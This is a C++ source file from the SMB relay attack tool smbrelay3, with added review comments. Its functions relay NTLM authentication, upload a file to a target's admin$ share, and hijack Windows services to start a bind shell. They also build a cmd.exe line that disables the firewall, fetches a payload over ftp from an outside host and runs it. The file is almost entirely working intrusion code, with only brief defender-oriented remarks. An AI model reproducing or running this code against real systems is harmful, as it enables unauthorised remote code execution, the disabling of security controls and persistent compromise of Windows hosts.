C:/Web/smbrelay3/src/payload.cpp

00001 #include "payload.h"
00002 #include <time.h>
00003 
//extern char *filter;
// Verbosity switch shared across translation units (defined elsewhere).
// NOTE(review): `debug`, read in WriteRemoteFile below, has no declaration in
// this file — presumably it arrives through payload.h; confirm.
extern int verbose;
/*
 * Walk a fixed list of service names on the relay destination and try to
 * repoint one of them at ServicePath, then start it.
 *
 * Preconditions visible here: the caller already holds an authenticated SMB
 * session in `buf` and an open pipe handle `FID`; every RPC below is carried
 * as an SMB_COM_TRANSACTION on that FID. `buf` is reused as both the request
 * template and the response area, so the build -> send -> read-back order of
 * the statements is load-bearing.
 *
 * Sequence: OpenSCManagerW(SC_MANAGER_CONNECT) once, then for each name
 * OpenServiceW(CHANGE_CONFIG|START|STOP) -> ChangeServiceConfigW(binary path =
 * ServicePath, SERVICE_AUTO_START, SERVICE_WIN32_SHARE_PROCESS) -> StartService,
 * stopping at the first service that gets that far.
 *
 * Returns 1 once a StartService request has been sent for some service, 0 when
 * the SCM could not be opened or no listed service could be reconfigured.
 * Progress goes to stdout.
 *
 * Defender's view: the host-side artifact of a success is an existing service
 * whose start type became auto and whose binary path became the caller-supplied
 * ServicePath, immediately followed by a start request on the same session.
 */
int AttackWeakServices(RELAY relay, char *buf,char *path, uint16 FID, char *ServicePath){
    smheader *packet;
    uint8 ContextHandle[20];               // SCM handle returned by OpenSCManagerW
    uint8 OpenedServiceContextHandle[20];  // per-service handle from OpenServiceW
    // Candidate services, one 100-char row each; the loop bound below divides by that row size.
    char ServiceName[][100] = {"DcomLaunch","Wmi","kdc","upnpHost","SSDPSRV","DHCP","NetBT","DnsCache","Pml Driver HPZ12","Adobe LM Service","Autodesk Licensing Service", "NICCONFIGSVC","Macromedia Licensing Service","vsdatant","C-DillaCdaC11BA","CdaC15BA","SecDrv" };
    int len;
    char data[4046];   // scratch area the *Stub builders fill with the RPC body
    int i,j;

    // Open the Service Control Manager with the least access that lets us enumerate handles.
    len=OpenScManagerWStub(data,path,SC_MANAGER_CONNECT) ;
    packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,OPENSCMANAGER,(char*)data,len);
    ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
    printf("[+] Opening Remote Service Control Manager (SC_MANAGER_CONNECT)\n");   
    // NOTE(review): `buf` is a char * in this scope, so sizeof(buf) is the
    // pointer size, not the capacity of the response area — confirm intent.
    i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
    free(packet);    
    // A usable reply is: bytes received, NtStatus == 0, and a DCE-RPC response PDU.
    if (( i<=0) || (((smheader*)buf)->NtStatus!=0x00000000)  || (GetDceRpcPacketFromBuffer(buf)->PacketType != RPC_RESPONSE) ){
       return(0);
    }
    // The 20-byte context handle is taken from the tail of the reply, 24 bytes
    // before its end; nothing checks that i >= 24 first.
    memcpy((char*)ContextHandle,buf+i-24,20);

    for (j=0;j<sizeof(ServiceName)/100;j++)
    {
        // Ask for the rights needed to rewrite and restart the service.
        len=OpenServiceWStub(data,(char*)ContextHandle,ServiceName[j],  SERVICE_CHANGE_CONFIG | SERVICE_START | SERVICE_STOP);
        packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,OPENSERVICEW,data,len);
        ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
        printf("[+] Attacking Remote Service %s\n",ServiceName[j]);
        i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
        free(packet);
        if (( i<=0) || (((smheader*)buf)->NtStatus!=0x00000000)  || (GetDceRpcPacketFromBuffer(buf)->PacketType != RPC_RESPONSE) ){
            printf("[-] Error. Unable to Open Remote service                            \n");
        } else {
            // Same tail-of-reply convention as for the SCM handle above.
            memcpy((char*)OpenedServiceContextHandle,buf+i-24,20);
            // Rewrite the service: binary path := ServicePath, start type auto, shared-process type.
            len=ChangeServiceConfigWStub(data,(char*)OpenedServiceContextHandle,ServicePath, SERVICE_AUTO_START,SERVICE_WIN32_SHARE_PROCESS);
            packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,CHANGESERVICECONFIG,data,len);
            ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
            printf("[+] Cambiando configuración de servicio...\r");   // runtime string, Spanish: "Changing service configuration..."
            i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
            free(packet);
            if (( i<=0) || (((smheader*)buf)->NtStatus!=0x00000000)  || (GetDceRpcPacketFromBuffer(buf)->PacketType != RPC_RESPONSE) ){
                printf("[-] Error. Unable to Modify Service...\n");
            } else {
                // StartService takes only the 20-byte service handle as its body.
                packet=BuildSmbPacket((smheader*)buf,SMB_COM_TRANSACTION,STARTSERVICE,OpenedServiceContextHandle, 20);
                ((SMB_COM_TRANSACTION_STRUCT*)packet->buffer)->FID=FID;
                // Fire-and-forget: the start reply is never read, the result is assumed.
                send(relay.destination, (char*)packet,  SmbPacketLen(packet),0) ;
                free(packet);
                Sleep(1000);
                // The port in this message is a hard-coded literal, not derived from ServicePath.
                printf("[+] *** Remote SmbRelay3 BindShell Service Running ***: (%s:%i)\n\n",relay.hostname,8080);    
                Sleep(3000);
                return(1);
            }

        }
    }
    return(0);
}
00064 
/*
 * Copy the local file lpFileName onto the relay destination's admin$ share
 * under the same name.
 *
 * Steps, all on the session carried in `buffer`: TREECONNETANDX to
 * \\<dest ip>\admin$, NTCREATEANDX for \<lpFileName>, a single WRITEANDX with
 * the whole file body, then SMBCLOSE on the returned FID. Each reply is read
 * back into the local 64000-byte `buf`, which is also the template for the
 * next request, so the statement order matters.
 *
 * Returns 1 on success, and also 1 when the create fails with
 * STATUS_SHARING_VIOLATION (the remote file is already open, treated as
 * "already deployed"); 0 on any other failure. Progress lines go to stdout,
 * packet dumps when `debug` is set (declared outside this file's visible scope).
 *
 * Ownership: filedata comes from ReadFileToSend and is freed here right after
 * the WRITEANDX packet is built; the NTCREATEANDX failure paths return before
 * that free. The packets returned by BuildSmbPacket are not freed in this
 * function (AttackWeakServices above does free its packets — TODO confirm
 * whether BuildSmbPacket always heap-allocates).
 */
int WriteRemoteFile(RELAY relay, smheader *buffer, char *lpFileName)
{
        char path[256];
        char buf[64000];
        smheader *packet;
        int i;
        int filesize;
        char *filedata;
        uint16 FID;
        uint16 TreeID;

        // UNC name of the admin share; sprintf is given no bound on path[256].
        sprintf(path,"\\\\%s\\admin$",inet_ntoa(relay.destinationaddr.sin_addr));
        memset(buf,0,sizeof(buf));
        // Empty password field, "?????" = any service type.
        i=BuildTreeConnectAndXStub(buf,"",path,"?????");
        packet=BuildSmbPacket((smheader*)buffer,TREECONNETANDX,0,buf,i);//,(int)strlen(path));
        printf("[+] Trying to connect to admin$\r");
    
        if (debug)
        {
        CleanLine(verbose);
        DumpMem((char*)packet,SmbPacketLen(packet));
        }
        i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
        // NtStatus is read from buf even when i<=0, i.e. from whatever was there before.
        if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
        CleanLine(verbose);
                printf("[-] Error. Unable to connect to admin$\n");
        return(0);
        }
        // Remember the tree id; the close packet below re-stamps it explicitly.
        TreeID=((smheader*)buf)->TreeId;


        // Remote name is the local name placed at the root of the share.
        sprintf(path,"\\%s",lpFileName);
        filedata =ReadFileToSend(&filesize,lpFileName);
        if(!filedata)
        {
                CleanLine(verbose);
        printf("[-] Error. Unable to open %s\n",lpFileName);
                return(0);
        }
        // NOTE(review): the length passed for `path` is filesize, not the
        // length of the name — presumably the NTCREATEANDX stub uses it as the
        // allocation size hint; confirm against BuildSmbPacket.
        packet=BuildSmbPacket((smheader*)buf,NTCREATEANDX,0,path,filesize);
        CleanLine(verbose);
        printf("[+] Creating Remote File %s under admin$\r",lpFileName);
        if (debug)
        {               
        CleanLine(verbose);
                DumpMem((char*)packet,SmbPacketLen(packet));
        }
        i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
        if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
        CleanLine(verbose);
        // A sharing violation is reported as success: something already holds the file open.
        if ( ((smheader*)buf)->NtStatus == STATUS_SHARING_VIOLATION) {
            printf("[-] Remote File already in use (try to connect to the remote Shell).\n");
            return(1);
        }
                printf("[-] Error. Unable to create file under admin$ (Error 0x%x)\n",((smheader*)buf)->NtStatus);
        return(0);
        }
        // The new file handle sits 6 bytes into the reply's data area.
        memcpy((char*)&FID,((smheader*)buf)->buffer+6,2);
        CleanLine(verbose);
        printf("[+] Writing File %s into admin$ (%i bytes)\r",lpFileName,filesize);
        // Whole file body in one WRITEANDX; the request template is still buf.
        packet=BuildSmbPacket((smheader*)buf,WRITEANDX,0,filedata,filesize);
        free(filedata);
        
        if (debug)
        {               
        CleanLine(verbose);
        DumpMem((char*)packet,SmbPacketLen(packet));
        }
        i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
        if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){               
        CleanLine(verbose);
        printf("[-] Error. Unable to Write File.\n");
        return(0);
        }

        // SMBCLOSE carries just the 2-byte FID; restore the tree id saved above.
        packet=BuildSmbPacket((smheader*)buf,SMBCLOSE,0,&FID,2);        
        
        packet->TreeId=TreeID;
        if (verbose)
        {       
        CleanLine(verbose);
        printf("[*] Closing File handle - FID: %2.2x\r",FID);
                if (debug) DumpMem((char*)packet,SmbPacketLen(packet));
        }
        i=SendBytesAndWaitForResponse(relay.destination,(char*)packet, SmbPacketLen(packet),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
        if ((i<=0) || (((smheader*)buf)->NtStatus!=0x00000000) ){
        CleanLine(verbose);
                printf("[-] Error Closing File Handle\n");
        return(0);
        }
        return(1);

}
00158 
00159 
00160 
00161 
00162 /*********************************************/
smheader *BuildSmbPacket1(void)
{
        /* First leg of the NTLM session setup: a zero-filled scratch area
         * receives the negotiate request built with null name arguments, and
         * its first 40 bytes are wrapped into a SESSIONSETUPANDX SMB that has
         * no predecessor packet. The returned packet belongs to the caller. */
        char scratch[4096] = {0};
        BuildAuthRequest((tSmbNtlmAuthRequest*)scratch, 0, NULL, NULL);
#ifdef _DBG_
        DumpMem((char*)scratch, SmbLength((tSmbNtlmAuthRequest*)scratch));
#endif
        return BuildSmbPacket((smheader*)NULL, SESSIONSETUPANDX, 0, scratch, 40);
}
00176 /*********************************************/
smheader *GetSmbPacket2(RELAY *relay,smheader* Packet1)
{
        /* Second leg: send Packet1 to the relay destination and hand back the
         * raw reply viewed as an smheader. The reply lives in a fresh heap
         * buffer of RESPONSE_CAP bytes that becomes the caller's to free; when
         * nothing comes back (rc <= 0) NULL is returned and that buffer is not
         * released by this function. */
        enum { RESPONSE_CAP = 4096 };
        char *reply = (char*)malloc(RESPONSE_CAP);
        int rc = SendBytesAndWaitForResponse(relay->destination, (char*)Packet1,
                                             SmbPacketLen(Packet1), reply,
                                             RESPONSE_CAP, SMBWAITTIMEOUT);
        return rc > 0 ? (smheader*)reply : NULL;
}
00187 /*********************************************/
smheader *GetSmbPacket3(smheader* SmbPacket2,char *lpUserName, char *lpPassword,  char *domainname, char *host, tSmbNtlmAuthResponse* OptionalNtlmPacket3)
{
        /* Third leg: derive the NTLM authenticate message from the challenge
         * carried inside SmbPacket2 and wrap it into a SESSIONSETUPANDX that
         * chains on SmbPacket2. OptionalNtlmPacket3 is forwarded untouched to
         * buildAuthResponse, which decides what it means. The returned packet
         * belongs to the caller. */
        char authMsg[16384] = {0};
        tSmbNtlmAuthChallenge *challenge =
                (tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2);
        buildAuthResponse(challenge, (tSmbNtlmAuthResponse*)authMsg, 0,
                          lpUserName, lpPassword, domainname, host, OptionalNtlmPacket3);
        int authLen = (int)SmbLength((tSmbNtlmAuthResponse *)authMsg);
        return BuildSmbPacket((smheader*)SmbPacket2, SESSIONSETUPANDX, 0, authMsg, authLen);
}
00198 /*********************************************/
00199 
00200 
/*
 * Build, into the caller-supplied `buffer`, the single cmd.exe command line
 * that is later handed to the target. Returns `buffer`.
 *
 * Shape of the line (every literal is visible below):
 *   if <path>\<downloadfile> already exists, run it;
 *   otherwise: netsh firewall set opmode DISABLE DISABLE, md <path>, echo an
 *   ftp script into <fullpath> (open host port, username, password, USER
 *   line, password again, bin, lcd <path>, bin, GET <downloadfile>, bye),
 *   run `ftp -s:<fullpath>`, then run <path>\<downloadfile>, with
 *   optionalparameter appended when it is non-NULL.
 * <path> is "\<rand>" and <fullpath> is "<path>\<rand2>"; both numbers come
 * from rand() seeded with the current time, so the names vary per run but
 * are not secret.
 *
 * Size contract: buffer's capacity is not passed in. Each fragment is
 * formatted into tmp[256] (fullpath is 100 bytes) with unbounded sprintf and
 * appended with strcat, so the caller must size buffer for the sum of all
 * fragments, and the host/user/password/downloadfile arguments must fit the
 * 256-byte fragment.
 *
 * Defender's view: the observable host artifacts of this line are the
 * firewall opmode change, a directory named by a number under the root of
 * the current drive containing an ftp script with the credentials in clear
 * text, an `ftp` process started with -s:, and the downloaded file executed
 * from that directory. The commented-out variant below opened TCP 8080 with
 * netsh instead of disabling the firewall.
 */
char *GenerateFTPTransfer(char *buffer,char *host, int port, char *username, char *password, char *downloadfile,char *optionalparameter)
{
    char tmp[256];        // one command fragment at a time
    char path[256];       // "\<rand>"  — working directory on the target
    char fullpath[100];   // "<path>\<rand2>" — the ftp script file
    int random=0;

    // Time-seeded rand() for the directory name, then reseeded from that
    // value for the script name.
    srand(time(0));
    random=rand();
    sprintf(path,"\\%i",random);
    srand(random);
    random=rand();
    sprintf(fullpath,"%s\\%i",path,random);

    // Earlier variant: opened a single port instead of disabling the firewall.
    //sprintf(tmp,"cmd.exe /c if EXIST %s\\%s (%s\\%s) ELSE netsh firewall set opmode DISABLE DISABLE & ",path,downloadfile,path,downloadfile);
    // Leading fragment: short-circuit if the file is already present, else disable the firewall.
    sprintf(tmp,"cmd.exe /c if EXIST %s\\%s (%s\\%s) ELSE netsh firewall set opmode DISABLE DISABLE & ",path,downloadfile,path,downloadfile);
    strcpy(buffer,tmp);

    sprintf(tmp,"md %s",path);
    strcat(buffer,tmp);
    // ftp script body, one `echo ... >> fullpath` per line.
    sprintf(tmp,"&& echo o %s %i>%s",host, port,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo %s>>%s",username,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo %s>>%s",password,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo USER %s>>%s",username,fullpath); //try password twice
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo %s>>%s",password,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo bin>>%s",fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo lcd %s>>%s",path,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo bin>>%s",fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo GET %s>>%s",downloadfile,fullpath);
    strcat(buffer,tmp);
    sprintf(tmp,"&& echo bye>>%s",fullpath);
    strcat(buffer,tmp);
    // Run the script non-interactively, then the fetched file.
    sprintf(tmp,"&& ftp -s:%s",fullpath);
    strcat(buffer,tmp);
    if (optionalparameter) {
            sprintf(tmp,"&& %s\\%s %s",path,downloadfile,optionalparameter);
    } else {
            sprintf(tmp,"&& %s\\%s",path,downloadfile);
    }
    strcat(buffer,tmp);

    return(buffer);
}
00252 
00253 
00254 
